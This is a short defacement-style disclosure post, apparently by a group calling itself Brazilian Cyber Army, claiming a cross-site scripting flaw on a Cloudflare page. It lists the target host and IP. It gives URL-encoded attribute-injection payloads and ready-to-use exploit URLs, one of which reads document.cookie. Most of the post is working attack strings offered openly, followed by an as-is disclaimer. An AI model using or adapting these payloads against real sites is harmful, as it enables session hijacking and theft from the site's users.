Brazilian Cyber Army @TeamBCA
www.cloudflare.com
Cross Site Scripting (XSS) Vulnerable
Terget: www.cloudflare.com/
Host IP: 141.101.123.216
Web Server: cloudflare-nginx
Print : https://lh6.googleusercontent.com/-qZQ_M2VmbRM/UQFgLaVjhsI/AAAAAAAAAbo/gzehK4at_Rs/s912/Xsscloud.jpg
Local Vulnerable: http://www.cloudflare.com/ajax/modal-dialog.html
/ajax/modal-dialog.html
Exploits: id=%22%20onmouseover%3dprompt%28911011%29%20bad%3d%22&type=vimeo
Exploit2: topics%5B%5D=903560%27%28%29%3a%3b969014&type=faq
http://www.cloudflare.com/ajax/modal-dialog.html?id=%22%20onmouseover%3dprompt%28911011%29%20bad%3d%22&type=vimeo
Document.Cookie : http://www.cloudflare.com/ajax/modal-dialog.html?id=%22%20onmouseover%3dprompt%28document.cookie%29%20bad%3d%22&type=vimeo
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information